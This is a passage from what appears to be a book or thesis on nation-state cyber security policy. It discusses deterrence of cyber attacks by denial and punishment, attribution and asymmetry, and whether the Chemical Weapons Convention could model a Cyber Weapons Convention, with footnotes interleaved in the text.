Even published operating system and application code is difficult for experts to understand thoroughly, as there are simply too many lines of code to analyze.378 The dynamic and fast-evolving nature of cyber attack technology contrasts sharply with the fundamental design of nuclear warheads, which, with the exception of the neutron bomb, has not changed much since the late 1950s.379 In the single month of May 2009, Kaspersky Anti-Virus Lab 372 The IAEA is the world’s nuclear inspectorate, with more than four decades of verification experience. Inspectors work to verify that safeguarded nuclear material and activities are not used for military purposes. The annual budget of IAEA is almost $500 million USD. 373 China, France, Russia, United Kingdom and United States. 374 Huntley, 2009. 375 Milhollin & Lincy, 2009. 376 With nuclear weapons, a hard-to-conceal test is required to prove that a capability exists. If the goal were cyber attack tool anti-proliferation, it would seem difficult to know if or when success had been achieved. 377 Jolly, 2009: In 2009, the French Interior Ministry investigated the collection of “strategic intelli- gence” by a former intelligence agent and a for-hire computer hacker on behalf of some of France’s biggest companies. 378 Cole, 2002. 379 There have, however, been many design modifications relating to safety, security, and reliability. 115 Deterrence: Can We Prevent Cyber Attacks? reported that it had found 42,520 unique, suspicious programs on its clients’ com- puters. Finally, in nuclear warfare one of the most important considerations is the retention of a second-strike capability. Following a surprise attack, is it still possible for the victim to fight back? In nuclear and conventional warfare, this is a constant worry among strategic planners. In contrast, a unique characteristic of cyber attacks is their ability to be launched from anywhere in the world, at any time. During the cyber attacks on Estonia in 2007, most of the compromised and attacking comput- ers were located in the United States.380 Cyber attacks can be set to launch under predetermined conditions or on a certain date in the future. Discovered attack tools can also be difficult to remove from a computer network completely, even by forensic experts. With cyber attack technology, it seems impossible to know for sure that all adversary attack options have been eliminated. Denial: Communication Cyber attacks now have the attention of the world’s national security planners. In the U.S., enhancing cyber security was one of the six “mission objectives” of the 2009 Director of National Intelligence (ODNI) National Intelligence Strategy,381 and counteracting the cyber threat is currently the third-highest priority of the Federal Bureau of Investigation (FBI), after preventing terrorist attacks and thwarting for- eign intelligence operations. However, cyber warfare is a new phenomenon; national and international norms have yet to be established. Different approaches are under consideration. One is to broaden international law enforcement coordination, specifically via the Council of Europe Convention on Cybercrime. Objections to this strategy include the possible infringement of national sovereignty by foreign law enforcement agencies. Another approach is to prohibit the development of cyber weapons via international treaty, such as that negotiated for chemical weapons. 
Articles to such a treaty might ban supply chain attacks and the disruption of non-combatant networks, as well as in- crease international management of the Internet. One objection to the second ap- proach is that it does little to improve cyber attack attribution.382 380 As computer incident response teams began to block hostile network packets, the source of the attack moved to countries with less mature and/or helpful network management practices. 381 The other five objectives were Combat Violent Extremism, Counter WMD Proliferation, Provide Stra- tegic Intelligence and Warning, Integrate Counterintelligence Capabilities, and Support Current Op- erations. 382 Markoff & Kramer, 2009b. 116 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES The Convention on Cybercrime is the first such international treaty. It describes law enforcement powers and procedures related to data interception and the search of computer networks. In 2009, forty-six nations were signatories, and twenty-six had ratified the treaty.383 Its main objective, set out in the Preamble, is to pursue a common criminal policy aimed at the protection of society against cybercrime, especially via national legislation and international cooperation. Deterrence is spe- cifically mentioned as a goal: “the present Convention is necessary to deter action directed against the confidentiality, integrity and availability of computer systems.” The continued success of the Convention on Cybercrime requires addressing myriad national and international data security and privacy concerns, including the respect for national sovereignty. A non-governmental organization in Thailand, for example, has claimed that similar legislation there has been used by the government more to threaten Thai citizens than to protect them.384 A proposed international treaty banning the development and use of hacker tools would be no less challenging to sign and enforce, because many hacker tools can properly be called dual-use tech- nology.385 The Council of Europe’s protocol on criminalizing racist and xenophobic statements on the Web may offer a partial solution. Because countries have wildly varying laws regarding what constitutes free speech, universally-accessible websites can create international legal headaches.386 This protocol recommends a nationally-tailored ap- proach to regulation that allows for implementation at the local ISP and end-user levels. In this way, signatories are able to project their norms of free speech onto the Internet, without extending liability beyond national borders.387388 Denial: Credibility Deterrence theory states that capability and communication alone are insufficient. The threatened party must believe that the threat of retaliation – or of a preemptive strike – is real. This third requirement of deterrence is the most difficult for national 383 The U.S. acceded to the Council of Europe Convention on Cybercrime on January 1, 2007. 384 Anonymous, 2009. 385 System administrators often use hacker tools such as a password cracker to audit their own networks. Cyber defense studies in academia require hacker tools for laboratory purposes. 386 For example, a French judge found a U.S. ISP criminally liable for hosting an auction of Nazi parapher- nalia, the sale of which is illegal in France. 387 Oberdorfer Nyberg, 2004. 388 The named methods of implementing the protocol are self-regulation of content by ISPs, government regulation of specific content, government regulation of end-users, and government regulation of local ISPs. 
117 Deterrence: Can We Prevent Cyber Attacks? security leadership to assess because it involves evaluating human psychology, ra- tionality, the odds of miscalculation, and foreign political-military affairs. At the beginning of the year 2011, it was still not likely that nation-states would sacrifice much to prevent the proliferation of cyber attack tools and techniques. Al- though it is indisputable that cyber attacks cause enormous financial damage, that world leaders increasingly complain of cyber espionage, and that Internet-connect- ed critical infrastructures are now at risk, deterrence theory was created for nuclear weapons. In terms of their destructive power, nukes are in a class by themselves. Cyber attacks per se do not cause explosions, deadly heat, radiation, an electro- magnetic pulse (EMP), or human casualties.389 However, a future cyber attack, if it caused any of the above effects, could change this perception. Worldwide technological convergence, as described by Dawson,390 is constantly expanding what hackers call the “attack surface.” In theory, the suc- cessful conquest of an adversary’s Internet space could equate to assuming com- mand and control of the adversary’s military forces, and firing their own weapons against their own cities. But for now, this scenario still lies in the realm of science fiction. Cyber Attack Deterrence by Punishment Deterrence by punishment is a strategy of last resort. It signifies that deterrence by denial was not possible or has failed, and that Country X possesses the technology it needs to threaten Country Y or its government. The goal of deterrence by punish- ment is to prevent aggression by threatening greater aggression in the form of pain- ful and perhaps fatal retaliation. For the strategy to work, Country X must be con- vinced that victory is not possible, even given the option of using its new technology. Two key aspects of cyber attacks present challenges to national security planners who would seek to deter them by punishment: attribution and asymmetry. The first challenge undermines a state’s capability to respond to a cyber attack, and the sec- ond undermines its credibility. Punishment: Capability All nations with robust military, law enforcement, and/or diplomatic might theoreti- cally have the power to punish a cyber attacker in some way, either in cyberspace 389 Persuasive cyber war skeptics include Cambridge University Professor Ross Anderson and Wired “Threat Level” Editor Kevin Poulsen. 390 Dawson, 2003. 118 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES or in the real world. And if a known attacker is beyond the reach of physical pursuit, the victim could at least present incriminating evidence in an international forum. But in practice, for punishment to be a viable option, the victim must know for sure who the attacker is and be able to prove it. In cyber warfare, the attacker enjoys a formidable advantage: anonymity. Proof in cyberspace is hard to come by. Smart hackers hide within the maze-like architec- ture of the Internet. They route attacks through countries with which the target’s government has poor diplomatic relations or no law enforcement cooperation, and exploit unwitting third-party networks. Cyber investigations typically end at a hacked, abandoned computer, where the trail goes cold. Plausible deniability is also a concern. 
Because hackers obscure the true origin of an attack by hopping through a series of compromised computers to reach their target, the real attacker could always claim that her computer had merely been hacked and used in someone else’s operation. This aspect of cyber attacks also makes “false flagging,” or intentionally trying to pin the blame on a third party, an attractive option. Even in the event that cyber attack attribution is positively determined, deterrence by punishment is still inherently less credible than deterrence by denial. It requires decision-makers to make more difficult choices. A proactive law enforcement strat- egy is easier to justify than the use of military force, which can cause physical de- struction, human casualties, or other collateral damage. At the very least, there will be serious diplomatic consequences. One important decision facing decision-makers in the aftermath of a cyber attack would be whether to retaliate in kind or to employ more conventional weapons. It may seem logical to keep the conflict within cyberspace, but a cyber-only response does not guarantee proportionality, and a cyber counterattack may lack the required precision. A misfire in cyberspace might adversely affect critical national infrastruc- ture, such as a hospital, which could result in a violation of the Geneva Conven- tion and even bring war crimes charges against national authorities.391 The Law of Armed Conflict states that the means and methods of warfare are not unlimited:392 commanders may use “only that degree and kind of force ... required in order to achieve the legitimate purpose of the conflict ... with the minimum expenditure of life and resources.”393 391 Graham, 1999. 392 See “Convention (IV) respecting the Laws and Customs of War on Land and its annex: Regulations concerning the Laws and Customs of War on Land.” The Hague, 18 October 1907, International Com- mittee of the Red Cross. 393 This quote is from The Manual of the Law of Armed Conflict, Section 2.2 (Military Necessity). United Kingdom: Ministry of Defence. Oxford: OUP. (2004). 119 Deterrence: Can We Prevent Cyber Attacks? Punishment: Communication Whereas deterrence by denial relies on a criminal law framework for support, the foundation of deterrence by punishment lies in military doctrine. When bombs be- gin to fall on adversary targets, diplomatic and law enforcement options have nor- mally run their course. Military doctrine serves at least two important purposes: to prepare a nation’s military forces for conflict, and to warn potential foes of the consequences of war. It should not be surprising that the advent of an open and ubiquitous communica- tions medium like the Internet demands a reassessment of military strategy, tactics, and doctrine. 
In 2006, a secret Israeli government report argued for a “sea change” in military thinking because the national security paradigm of army versus army was under assault by suicide bombers, Katyusha rockets and computer hackers, none of whom has to have direct ties to government or even be susceptible to po- litical pressure.394 In China, the potential impact of computer network operations on the nature of warfare is thought to be strong enough even to have transformed 2,500 years of military wisdom; the Chinese military has almost certainly quit the defensive depth of the Chinese countryside to conquer international cyberspace.395 In Washington, one of the first reports that incoming President Obama found on his desk was “Securing Cyberspace for the 44th Presidency,” which argued that the U.S. must have a credible military presence in cyberspace to act as a deterrent against operations by its adversaries in that domain.396 Cyber doctrine must address how military and civilian authorities will collaborate to protect private sector critical information infrastructure. Even cyber attacks that strike purely military sites are likely to traverse civilian networks before reaching their target. In fact, the destruction of civilian infrastructure may be the cyber at- tacker’s only goal. A further challenge is that private sector enterprises such as banks have been reluctant to disclose successful cyber attacks against them for fear of an impact on their bottom line. This dynamic could make it difficult for national security leadership even to know that an attack on its national territory – in violation of its national sovereignty – has occurred. Thus, proactive cyber attack deterrence by government to defend civilian infrastructure will be difficult to achieve, and any national response may be too little, too late. The dynamic nature of cyber attacks could ensure that defenders never see the same attack twice. Therefore, decision makers will need a range of diplomatic and military options to consider for a punitive response. In terms of military doctrine, 394 Fulghum, 2006. 395 Rose, 1999. 396 Lewis, 2008. 120 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES one possibility might be the delineation of red lines in cyberspace. Propaganda and low-level computer network exploitation (CNE) may trigger the first line of passive cyber defense, while the manipulation of code in an operational weapons system could be grounds for real-world retaliation. Finally, to support a deterrence strategy, cyber doctrine must be clearly written. An adversary should have no doubt what the consequences will be if the red lines are crossed. Punishment: Credibility As we have seen, the credibility of cyber attack deterrence by denial is low. The po- litical will and even the capability to attempt such a denial are lacking. Therefore, a strategy of cyber attack deterrence by punishment is a more likely scenario. The trouble with a punishment strategy, however, is that governments are always reluctant to authorize the use of military force (for good reason). Deterrence by pun- ishment is a simple strategy, but one that demands a high burden of proof: a serious crime must have been committed, and the culprit positively identified. The challenge of cyber attack attribution, as described above, means that decision-makers will likely not have enough information on an adversary’s cyber capabilities, intentions, and operations to respond in a timely fashion. 
However, there is another characteristic of cyber attacks that undermines the cred- ibility of deterrence by punishment even more: asymmetry. At the nation-state level, some countries are more dependent upon the Internet than others. Some govern- ments possess sophisticated computer network attack programs, while others have none at all. Non-state actors such as a lone hacker or a terrorist group may not possess any computer network or other identifiable infrastructure against which to retaliate. The asymmetric nature of information technology and cyber warfare manifests it- self in countless ways. From a technical perspective, the Smurf attack is a classic ex- ample. A hacker sitting at computer X pretends to be coming from computer Y, then requests data from hundreds of other computers at once. Myriad responses easily overwhelm computer Y, creating a denial-of-service condition.397 From a human per- spective, the case of Briton Gary McKinnon is illuminating. According to McKinnon, he is a “bumbling hacker” who was merely looking for UFO data on unsecured Penta- gon networks. But the U.S. prosecutor seeking his extradition describes McKinnon’s 397 See “Smurf IP Denial-of-Service Attacks,” CERT Advisory CA-1998-01. 121 Deterrence: Can We Prevent Cyber Attacks? exploits as “the biggest military computer hack of all time.”398399 In terms of financial damages, “MafiaBoy” – a 15 year-old kid from Montreal – in 2001 was able to deny Internet service to some of the world’s biggest online companies, causing an esti- mated $1.7 billion in damage.400 Mutually Assured Disruption (MAD) There is a growing relationship between computer security and national security. Military leaders, fearing the potential impact of cyber warfare as well as the start of a cyber arms race, are now considering whether it is possible proactively to deter cyber attacks. At the nation-state level, there are two possible deterrence strategies: denial and punishment. In cyberspace, both suffer from a lack of credibility. Denial is unlikely due to the ease with which cyber attack technology can be acquired, the immaturity of international legal frameworks, the absence of an inspection regime, and the per- ception that cyber attacks are not dangerous enough to merit deterrence in the first place. Punishment is the only real option, but this deterrence strategy lacks cred- ibility due to the daunting challenges of cyber attack attribution and asymmetry. At a minimum, attribution must improve before a cyber attacker may feel deterred. This will take time. In the short term, organizations must improve their ability to collect and transmit digital evidence, especially to international partners. In the long term, national security planners should try to create a Distant Early Warning Line (DEWL) for cyber war and the capability to select from a range of rapid response tactics. To pave the way forward, a legal foundation for cyber attack, defense, and deter- rence strategies is needed as soon as possible. Because information technology changes so quickly – no one can predict what the next cyber attack will look like – it may be necessary to adopt an effects-based approach. If a cyber attack results in a level of human suffering or economic destruction equivalent to a conventional mili- tary attack, then it could be considered an act of war, and it should be subject to the existing laws of war. 
Consequently, national security planners have no time to waste in reevaluating, and updating, if necessary, the Geneva, Hague, and Human Rights conventions, as well as the Just War theory, and more.

398 Lee, 2006. 399 Glendinning, 2006: The press has speculated whether one reason for prosecuting McKinnon is for the deterrent effect it could have on other cyber attackers. 400 Verton, 2002.

Back to the Cold War. By the year 1968, Soviet mastery of nuclear technology had made one-sided nuclear deterrence meaningless.401 The U.S. and the USSR were forced into a position of mutual deterrence or Mutually Assured Destruction (MAD). Both sides had the ultimate weapon, as well as a second-strike capability. Although cyber attacks do not possess the power of a nuclear explosion, they do pose a serious and increasing threat to international security, and anti-proliferation efforts appear futile. Welcome to the era of Mutually Assured Disruption.402

401 Specifically, it was the Soviet Union’s ability to mass produce nuclear weapons, and to compete in the nuclear arms race, that changed the strategic equation in 1968. 402 Pendall, 2004; Derene, 2009.

8. ARMS CONTROL: CAN WE LIMIT CYBER WEAPONS?

As world leaders look beyond temporary fixes to the challenge of securing the Internet, one possible solution may be an international arms control treaty for cyberspace. The 1997 Chemical Weapons Convention (CWC) provides national security planners with a useful model. CWC has been ratified by 98% of the world’s governments and encompasses 95% of the world’s population. It compels signatories not to produce or to use chemical weapons (CW), and they must destroy existing CW stockpiles. As a means and method of war, CW have now almost completely lost their legitimacy. This chapter examines the aspects of CWC that could help to contain conflict in cyberspace. It also explores the characteristics of cyber warfare that seem to defy traditional threat mitigation.

Cyber Attack Mitigation by Political Means

The world has grown so dependent on the Internet that governments may seek far-reaching strategic solutions to help ensure its security. Every day, more aspects of modern society, business, government, and critical infrastructure are computerized and connected to the Internet. As a consequence and for the sake of everything from the production of electricity to the integrity of national elections, network security is no longer a luxury, but a necessity.403

A fundamental challenge to better network security is that computers are highly complex objects that are inherently difficult to secure. The Common Vulnerabilities and Exposures (CVE) List grows by nearly one hundred every month.404 There are likely more pathways into your computer network than your system administrators can protect. And to a large degree, this explains the high return on investment enjoyed by cyber criminals and cyber spies.

In the future, if war breaks out between two or more major world powers, one of the first victims could be the Internet itself.
The reason is that classified cyber at- tack tools and techniques available to military and intelligence agencies are likely far more powerful than those available to the general public.405 However, as with chemical weapons (CW) and even with nuclear weapons, it is possible that non-state 403 Mostyn, 2000: At least a decade ago, the widespread use of anonymous email services to support criminal activity had convinced some that an international convention would be needed to regulate its use. 404 “Common Vulnerabilities and Exposures List,” The MITRE Corporation, http://cve.mitre.org/. 405 McConnell, 2010: Mike McConnell, former director of the U.S. National Security Agency and Director of National Intelligence, recently wrote in the Washington Post that “the lion’s share of cybersecurity expertise lies in the federal government.” 124 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES actors, including terrorists, will acquire strategically significant cyber attack tools and techniques in the future.406 What is to be done? Severing one’s connection to cyberspace is not an attractive op- tion. The benefits of connecting to the Internet usually outweigh the drawbacks; this quickly undermines a fortress mentality. And even theoretically “closed” networks – those with no direct connection to the Internet – are still subject to a wide range of computer network attacks (CNA).407 In light of our dependence on such vulnerable technology, and due to the fact that CNA is difficult to stop, world leaders may try to negotiate international agreements designed to contain conflict on the Internet.408 Cyber arms control is one possible strategy, and the 1997 Chemical Weapons Convention (CWC) may provide a strong candidate model.409 The Chemical Weapons Convention Chemical weapons (CW) are almost as old as warfare itself. Archeologists have found poison-covered arrowheads dating to 10,000 BC.410 In the First World War, CW may have caused one-third of the estimated 5 million casualties. Today, terrorists are at- tracted to CW not only for its killing power, but also due to its ease of acquisition.411 As a weapon, CW employs the toxic properties of certain chemicals in a way that can kill, injure or incapacitate humans and animals. Throughout history, each new generation of CW has been more dangerous than its predecessor.412 In 1997, 95 nations signed CWC, an international arms control agreement that has been a success by almost any measure. The treaty’s purpose is reflected in its full name: Convention on the Prohibition of the Development, Production, Stockpiling 406 Lewis, 2010: James Lewis of CSIS recently stated: “It remains intriguing and suggestive that [ter- rorists] have not launched a cyber attack. This may reflect a lack of capability, a decision that cyber weapons do not produce the violent results terrorists crave, or a preoccupation with other activities. Eventually terrorists will use cyber attacks, as they become easier to launch...”. 407 Military and intelligence agencies are capable of supply chain attacks, insider exploitation, the stand- off kinetic destruction of computer hardware, and the use of electromagnetic radiation to destroy unshielded electronics via current or voltage surges. 408 Markoff & Kramer, 2009a: According to The New York Times, Russian negotiators have long argued that an international treaty, similar to those that have been signed for WMD, could help to mitigate the threat posed by military activities to civilian networks, and that in 2009 the U.S. 
appeared more willing to discuss this strategy. 409 Others could be the Nuclear Non-Proliferation Treaty or the Biological Weapons Convention. 410 Mayor, 2008. 411 Newmark, 2001. 412 Ibid. 125 Arms Control: Can We Limit Cyber Weapons? and Use of Chemical Weapons and on their Destruction. Its goal is to eliminate the entire category of weapons of mass destruction (WMD) that is associated with toxic chemicals and their precursors. The CWC Preamble declares that achievements in chemistry should be used exclusively for beneficial purposes, and that the prohibi- tion on CW is intended “for the sake of all mankind.” Each signatory is responsible for enforcing CWC within its legal jurisdiction. This includes overseeing the destruction of existing CW and the destruction of all CW production facilities. Under the convention, all toxic chemicals are considered weap- ons unless they are used for purposes that are specifically authorized under CWC. Further, members are prohibited from transferring CW to or from other nations. CWC is administered by the Organization for the Prohibition of Chemical Weapons (OPCW), based in The Hague, which is an independent entity working in concert with the United Nations. OPCW has a staff of 500 and a budget of EUR 75 million.413 Currently, 188 nations, encompassing 98% of the global population, are party to CWC. A mere 13 years old, CWC has enjoyed the fastest rate of accession of any arms control treaty in history.414 Since 1997, over 56% of the world’s declared stock- pile of 71,194 metric tons of chemical agent has been destroyed, along with almost 50% of the world’s 8.67 million chemical munitions and containers.415 CWC: Lessons for Cyber Conflict Governments addressed the threat from CW by creating CWC. In order to counter the threat posed by cyber attacks and cyber warfare, world leaders may decide to create a similar regime, a Cyber Weapons Convention. In that event, international negotiators will likely examine CWC to see whether its principles are transferrable to the cyber domain. This author has identified five principles characteristic of CWC that may be useful in this context: political will, universality, assistance, prohibition, and inspection.416 Political will. On March 21, 1997, Presidents Bill Clinton and Boris Yeltsin issued a joint statement from Helsinki, stating that they were committed to the ratification of 413 OPCW website: www.opcw.org. 414 Challenges remain: Angola, Egypt, Israel, Myanmar, North Korea, Somalia, and Syria are still outside CWC; the U.S. and Russia are highly unlikely to meet the legally binding CW destruction deadline of April 2012; advances in science and technology pose constant challenges to the integrity of the inspections regime. 415 OPCW website: www.opcw.org. 416 I derived these five principles in part from the article Mikhail Gorbachev and Rogelio Pfirter wrote for Bulletin of the Atomic Scientists and from Oliver Meier’s interview with Pfirter in Arms Control Today. 126 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES CWC in order to “banish poison gas from the Earth.”417 At the end of the Cold War, the U.S. and Russia possessed the lion’s share of CW, and CWC could not have been a success without their leadership. However, all signatories had to be convinced that they had more to gain from joining CWC than they had to lose by remaining outside it. 
In the case of CW, there is a genuine abhorrence that the science of chemistry has been used for such lethal purposes, as well as a fear that terrorist groups – who lack the accountability of sovereign governments – will obtain CW. Universality. In 1997, more than two dozen countries possessed CW.418 Further- more, since CW technology was not difficult to acquire, that number would have continued to grow. CWC authors therefore designed the convention as a universal treaty with a universal and permanent goal. All nations are encouraged to become members, and the treaty’s endgame is the elimination of an entire class of WMD. Therefore, CWC represents the broadest possible multilateral security framework. At first glance, this strategy could be an obstacle to treaty advancement. However, universality also provides a strong recruitment incentive: peer pressure. A higher ratio of members to non-members increases one’s sense of security gained by acces- sion and heightens the isolation felt by those who remain on the outside. Assistance. OPCW offers enormous practical aid to CWC members. Above all, sig- natories are helped to fulfill treaty requirements, beginning with the destruction of CW and CW production facilities. Further, OPCW actively promotes the advance- ment of peaceful uses of chemistry for economic development. This includes the provision of training for local experts. Finally, OPCW offers advocacy to treaty mem- bers in the event they are threatened by the CW of another state. Prohibition. CWC has proven that verifiable destruction of CW and their produc- tion facilities is feasible. By 2010, over 50% of the world’s declared chemical agent stockpiles had been verifiably destroyed, as well as nearly 50% of declared chemical munitions. Some states had completely eliminated their CW programs. At the cur- rent rate, over 90% of the world’s known CW will be destroyed by 2012. Although seven nations remain outside CWC, no new states have acquired CW since 1997. The success of CWC stands in contrast to the 1968 Nuclear Non-Proliferation Treaty (NPT). Despite the efforts of NPT, the size of the world’s nuclear club has grown from five419 to nine.420 417 “The President’s News Conference...” 1997. 418 Cole, 1996. 419 These are also the permanent members of the United Nations Security Council: China, France, Russia, UK, and the U.S. 420 Huntley, 2009: De facto members now include India, Israel, Pakistan, and North Korea. 127 Arms Control: Can We Limit Cyber Weapons? Inspection. Since 1997, almost 4,000 CWC inspections have been conducted on the territory of 81 member states in order to verify treaty compliance. These have taken place at almost 200 known CW-related sites and at over 1,000 other industrial sites. Nearly 5,000 facilities around the world are liable to CWC inspection at any time. One of the primary benefits of CWC membership is the right to request a “challenge inspection” on the territory of a fellow member state, based on the principle of “any- time, anywhere,” with no right of refusal. Toward a Cyber Weapons Convention Cyber warfare is not chemical warfare. Although they share some similarities – in- cluding ease of acquisition, asymmetric damage, and polymorphism – the tactics, strategies, and effects are fundamentally different. Chemical warfare kills humans; cyber warfare kills machines.421 As a means of waging war, however, both chemical and cyber attacks represent a potential threat to national security. 
As such, diplomats may be asked to negotiate international agreements designed to mitigate the risk of cyber warfare, just as they have done for CW. The five principles described in the previous section have helped to make CWC a success. In this section, the author argues that the first three principles are clearly transferable to the cyber domain, while the final two are not. Political will. International treaties require widespread agreement on the nature of a common problem. The threat posed by cyber attacks – based on national capabili- ties as well as the fear that terrorists will begin to master the art of hacking – could be strong enough to form such a political consensus. The 2010 cyber attack on Google was serious enough to begin discussion in the U.S. on whether to create an ambassador-level post, modeled on the State Department’s counterterrorism coordi- nator, to oversee international cyber security efforts.422 As with CWC, a convention intended to help secure the Internet would need the major world powers behind it to succeed. At a minimum, in today’s world that means the U.S., Russia, China, and the EU.423 421 To be more specific, cyber attacks usually target the data resident on or functionality of a machine. It is also important to note that inoperable machines can kill humans: examples include medical equip- ment and national air defense systems. By the same token, chemical warfare can also kill flora, fauna, and human input to machines. 422 Gorman, 2010. 423 With CWC, the Middle East conflict continues to pose the most serious challenge to worldwide agree- ment, and it could do the same for a Cyber Weapons Convention. 128 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES Universality. One of the primary challenges to improved computer security is the fact that the Internet is a worldwide enterprise. The jurisdiction of law enforcement and counterintelligence personnel ends every time a network cable crosses an in- ternational border. Even though thousands of miles may separate an attacker and defender in the real world, everyone is a neighbor in cyberspace, and attackers often have direct access to their victims. Smart hackers hide within the maze-like archi- tecture of the Internet and route attacks through countries with which the victim’s government has poor diplomatic relations or no law enforcement cooperation. In 2010, there are plenty of cyber safe havens where criminals, spies and terrorists can operate without fear of reprisal.424 Although the global nature of cyberspace makes the practical task of securing the Internet inherently more difficult, the universal goals of CWC are highly appropriate in the cyber domain. Politicians, international negotiators, and the public will have no trouble understanding this characterization, and universality would be a cornerstone of a Cyber Weapons Convention. Assistance. Vulnerabilities in computer networks and the advantages they create for an attacker will persist for the foreseeable future. Consequently, organizations have no choice but to invest more time and effort into computer security. However, a proper implementation of best practices such as risk management, awareness train- ing, defense-in-depth, and incident handling425 usually requires more expertise and resources than most organizations and even many countries have available. Within CWC, OPCW offers practical aid to its members. 
In the same fashion, a Cyber Weap- ons Convention could create an internationally-staffed institution dedicated to help- ing signatories improve their cyber defense posture and respond effectively to cyber attacks when they occur. Experts could provide technical, legal, and policy advice via consultation and training. A crisis response team could be available to deploy worldwide at a moment’s notice, ready to publish its findings to the world. And as with CWC, the institution could actively promote the benefits of peaceful uses of computer technology for economic development and cooperation. One significant but difficult step for governments to take would be the joint instru- mentation and observation of the Internet and its network traffic flows. Many cyber threats, such as the one posed by botnet technology, simply move too quickly for the kind of traditional inspections that OPCW provides. Cyber attack mitigation re- quires immediate source identification and the ability to cross technical, legal, and national borders quickly. The best chance that future Cyber Weapons Convention 424 Gray & Head, 2009. 425 For example, the U.S. Computer Emergency Readiness Team (US-CERT) offers many free publications in the following categories: “General Internet security,” “Securing your computer,” “Recovering from an attack,” and “Monthly and quarterly reports” (www.us-cert.gov/reading_room/); however, most system administrators simply do not have the time to study, absorb, and implement all such recom- mendations. 129 Arms Control: Can We Limit Cyber Weapons? monitors would have is with access to real-time network data from across the whole of the Internet and the ability to collaborate immediately with treaty-empowered colleagues throughout the world.426 National sovereignty and data privacy concerns would have to be carefully guarded. Furthermore, the technical and forensic side of the regime should be separated as much as possible from its legal and political ramifications. Data analysts could not have access to any personally identifiable information, but when cyber attacks are observed, the appropriate law enforcement organizations must be notified. Prohibition. The proof that CWC has been a success lies in the large volume of CW that has been verifiably destroyed. The principle of prohibition, however, would be the most challenging aspect of CWC to apply in cyberspace. Malicious computer code is notoriously difficult to define. In the single month of May 2009, Kaspersky Anti-Virus Lab found 42,520 “unique malicious, advertising, and poten- tially unwanted” programs on its clients’ computers.427 Even in a well-designed and malware-free network, a legitimate path for remote system administration can be used by a masquerading hacker, who has correctly guessed or stolen its password, to thoroughly undermine its confidentiality, integrity, and/or availability. Any com- puter programmer can learn to write malware, and non-programmers can simply download professional-quality attack tools from well-known websites. Further, cy- ber warfare is unlike chemical warfare in that cyber attacks often demand stealth and anonymity. At a minimum, any prohibition on malware will require substantial progress on solving the cyber attack “attribution” problem.428 This will take time, and involve technical, legal, and international cooperation on a level far higher than it exists today. Inspection. 
Similar to prohibition, the CWC inspection regime has been a success, but it is difficult to imagine how the principle of inspection could easily be applied in cyberspace. Around the world, 5,000 industrial facilities are subject to CWC in- spection at any time; this is a large but manageable number. Compare it to the amount of digital information that can be placed on one removable thumb drive. In 2010, a 256 GB USB Flash drive cost under $1000;429 it held over 2 trillion bits of data. Even widely-published operating system and application code can be almost impossible to understand thoroughly – even for experts – because there is simply 426 Such an effort would be daunting from a technical perspective, but in theory, if this is possible to accomplish in one large country, it should be possible across the globe. On a human level, thousands of international CERT personnel already do it on a less formal basis every day. 427 “Monthly Malware Statistics...” 2009. 428 This refers to anonymous cyber attacks, described in the Universality section above. 429 The Kingston DataTraveler® 310 is currently advertised as the highest capacity USB Flash drive on the market. 130 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES too much information to analyze.430431 Malware can be written on any computer, and transmitted to the Net from any network access point. In the U.S. alone, there are 383 million computers connected directly to the Internet.432 In theory, a Cyber Weapons Convention could require closer inspection and monitoring at the Internet Service Provider (ISP) level. However, such regimes are already commonplace, such as China’s Golden Shield Project, the European Convention on Cybercrime, Russia’s SORM,433 and the USA PATRIOT Act. Each is unique in terms of guidelines and en- forcement, but all face the same problem of overwhelming traffic volume. The Challenges of Prohibition and Inspection The challenge of securing the Internet appears to be worsening with time.434 World leaders may eventually decide that the best way to mitigate the threat posed by cy- ber attacks is by signing an international cyber arms control treaty.435 The Chemical Weapons Convention (CWC) constitutes a useful model. It boasts the vast majority of world governments as signatories and has tangibly reduced the threat of chemical warfare, both by delegitimizing the use of chemical weapons (CW) and by dramatically reducing the quantity of CW in existence. This chapter highlights five principles that have helped to make CWC a success, and examines each principle to see whether it could support the development of a Cyber Weapons Convention. 430 Cole, 2002. 431 Even if it were possible, software is dynamic. Programs constantly change their functionality via security patches and other updates. 432 This figure is from The World Factbook, published by the U.S. Central Intelligence Agency, and de- scribes the number of “Internet hosts” in a country. These are defined as “a computer connected directly to the Internet ... Internet users may use either a hard-wired terminal ... or may connect remotely by way of a modem via telephone line, cable, or satellite to the Internet Service Provider’s host computer.” 433 Система Оперативно-Розыскных Мероприятий or “System for Operative Investigative Activi- ties.” 434 Geers, 2010. 435 “Espionage Report...” 2007; Cody, 2007: Many vignettes could be recited here. 
In 2007, German Chan- cellor Angela Merkel visited China for a state meeting which was overshadowed by a media claim that Chinese hackers had been caught attempting to steal data from Merkel’s chancellery and other Berlin ministries. The Chinese government denied the allegations, but Prime Minister Wen Jiabao nonethe- less told Merkel that measures would be taken to “rule out hacking attacks.” The following month, Chinese Vice Information Industry Minister Lou Qinjian wrote in a Communist Party magazine that foreign intelligence services had also caused “massive and shocking” damage to China via computer hacking. 131 Arms Control: Can We Limit Cyber Weapons? The first three principles – political will, universality, and assistance – are easy to apply in the cyber domain. None of them is a perfect fit, but as with CWC, all of them are appropriate to the nature and challenges of managing Internet security. The final two principles – prohibition and inspection – are not helpful at this time. It is difficult to prohibit or inspect something that is hard to define and which grows by orders of magnitude on a regular basis. In fact, these two catches could prove sig- nificant enough that a future treaty may not be called Cyber Weapons Convention, but something more generic, such as Internet Security Convention. On balance, the three applicable principles provide world leaders with a good start- ing point to explore the prospects for a Cyber Weapons Convention. If national and Internet security thinkers decide that an international cyber arms control treaty is the right way forward, political leaders may give scientists the funding they need to attack the technical challenges of prohibition and inspection. 132 DATA ANALYSIS AND RESEARCH RESULTS IV. DATA ANALYSIS AND RESEARCH RESULTS 9. DEMATEL AND STRATEGIC ANALYSIS In this research study, the author will employ the Decision Making Trial and Evalua- tion Laboratory (DEMATEL) to analyze the most important concepts and definitions. The goal of using DEMATEL is twofold: to increase the rigor of the author’s analysis via scientific method, and to help provide decision makers with greater confidence as they attempt to choose the most efficient ways to mitigate the threat of cyber at- tacks and improve cyber security at the strategic level. DEMATEL is a comprehensive scientific research method, developed in the 1970s by the Science and Human 